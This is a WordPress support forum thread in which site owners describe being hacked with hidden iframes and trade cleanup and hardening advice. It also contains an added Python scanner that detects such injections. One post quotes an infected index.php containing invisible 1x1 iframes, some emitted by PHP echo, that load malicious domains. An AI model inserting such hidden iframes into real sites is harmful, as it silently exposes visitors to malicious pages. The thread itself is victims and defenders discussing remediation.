• joeyconnick

    (@joeyconnick)


    Just had a WordPress site of mine that was hacked earlier this morning, had an iframe directing to lotultimatebet.cn inserted in the main *.php files throughout the site.

    Has anyone else experienced this? And does anyone know how to protect against whatever attack was used?

Viewing 15 replies - 1 through 15 (of 30 total)
  • tomontoast

    (@tomontoast)

    To guarantee that you won’t get hacked, always use the latest version of WordPress, only use plugins, scripts and themes which you trust, and use a secure password for your WordPress admin, your database and your FTP. Just out of interest, what is the URL for your site?

    web1@naturopathy-uk.com

    (@web1naturopathy-ukcom)

    I had the same thing. I am using WP 2.5.1 on the site. When upgrading to 2.7.1 I ran into problems on another site, so I didn’t upgrade yet.

    In fact the one with 2.7.1 has been hacked too. I can’t even get back into the back-end at the moment.

    tomontoast

    (@tomontoast)

    Could you post a link to that hacked site?

    bsains

    (@bsains)

    Be aware joeyconnick that you could possibly have a rootkit installed on your system.

    I’ve recently had issues with sites that I develop, albeit .Net sites, also hacked and injected with same/similar iframe code. An example below…

    betbigwager.cn/in.cgi?income61
    lotultimatebet.cn/in.cgi?income60

    I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propagating the rootkit. I say this because AVG picked up the presence of rootkit activity after I viewed an infected page.

    In regards to how I was compromised… I was not surfing inappropriate material, nor executing unknown files… I think it’s probably a Firefox exploit… more than likely on an add-on. Good Luck.

    Thread Starter joeyconnick

    (@joeyconnick)

    Thanks for the info, bsains. I doubt it’s a rootkit on my system but it might be one on the system of my friend whose blog it is. She’s the one who usually interacts with it.

    We were also advised it might have been a brute-force attack against her ftp password.

    Yeah, the injected iframe stuff for us was the lotultimatebet site.

    I’ll see if her anti-virus software has rootkit detection.

    UseShots

    (@useshots)

    Hi,

    This is not a WordPress exploit. Most likely FTP password is compromised.

    I’ve just covered this particular exploit in my blog.
    http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

    1. Scan local computers for viruses and spyware
    2. Change FTP passwords
    3. Upload clean content from a backup

    junem0

    (@junem0)

    Euh, don’t know. How do you know when your WP is hacked?

    Samuel B

    (@samboll)

    transpersonal

    (@transpersonal)

    For the future:

    1. Change your database prefix:

    http://semperfiwebdesign.com/documentation/wp-security-scan/change-wordpress-database-table-name-prefix/

    2. Change username from admin to something else

    3. Install the following plugins:

    -apache password protect:

    http://wordpress.org/extend/plugins/askapache-password-protect/

    -wordpress security scan:

    http://wordpress.org/extend/plugins/wp-security-scan/

    -wordpress firewall:

    http://www.seoegghead.com/software/wordpress-firewall.seo

    4. Disable ping response (ICMP) on your server (if you have the rights), this will prevent some DOS attacks:

    http://techgurulive.com/2008/11/06/how-to-disable-ping-response-linux/

    cnmadmin

    (@cnmadmin)

    Thanks all for your answers. I’ve changed passwords, uploaded clean content, etc and am going through other steps to avoid wasting a day of my life again.

    Tomontoast to answer your q:
    1. http://www.naturopathy-uk.com
    2. http://www.naturopathy.ie
    3. http://www.cnmstudent.com

    Here is what appears in my index.php file

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./blog/wp-blog-header.php');
    
    echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    ?>
    <iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
    <iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
    
    <iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

    What should I do now… All my blogs have been similarly hacked, even non-wordpress domains

    UseShots

    (@useshots)

    The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.

    The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated – it injects PHP-code. I didn’t investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.
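An added example, not part of the original thread and not UseShots’ code: a small scanner for the two injection shapes described in the post above, a hidden 1x1 iframe appended after the end of a file and one emitted from a PHP `echo`. The sample file, the `.example` hostnames and the function names are constructed for illustration.

```python
import re
from pathlib import Path

# Constructed sample in the shape of the infected index.php quoted in this thread.
SAMPLE_PHP = r'''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
echo "<iframe src=\"http://injected-a.example/?click=AAAA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="http://injected-b.example/in.cgi?income00" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
'''

# Tags may be raw HTML or sit inside a PHP echo string with \" quoting.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HOST_RE = re.compile(r"""src\s*=\s*\\?["']?(?:https?:)?//([^/\s"'\\>?#:]+)""", re.I)
TINY_RE = re.compile(r"""\b(?:width|height)\s*=\s*\\?["']?[01]\b""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SCAN_EXT = {".php", ".html", ".htm"}  # assumption: extend for your site


def find_hidden_iframes(text):
    """Return (line, host, appended) for every invisible or 0/1-pixel iframe."""
    hits = []
    # Offset of the last closing PHP tag or </html>; anything later was appended.
    tail = max(text.rfind("?>"), text.lower().rfind("</html>"))
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if not (TINY_RE.search(tag) or HIDDEN_RE.search(tag)):
            continue  # normally sized, visible embeds are left alone
        host_m = HOST_RE.search(tag)
        host = host_m.group(1).lower() if host_m else None  # None: relative src
        line = text.count("\n", 0, m.start()) + 1
        hits.append((line, host, tail != -1 and m.start() > tail))
    return hits


def scan_tree(root):
    """Scan web files under root; return {relative path: hits} for flagged files."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = find_hidden_iframes(text)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report
```

Run `scan_tree()` over a downloaded copy of the web root; a hit with `appended` set to `True` matches the bottom-of-file pattern, and every flagged file should be restored from a clean backup rather than hand-edited.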

    We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain access.

    Does anyone have a plugin which automatically sends an alert to the owner’s email address if someone tries a wrong password on our blog, or some other kind of instant notification? That would also be helpful. What do you guys think?

    My website was also hacked this week and I’ve been spending the last two days fixing it. I think I finally got it resolved. They injected links into a lot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added a lot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/

    @saaqi If you wanted a plugin to help with securing your log in, Stealth Login, Login LockDown, and Chap Secure Login are your best options.

  • The topic ‘WordPress hacked’ is closed to new replies.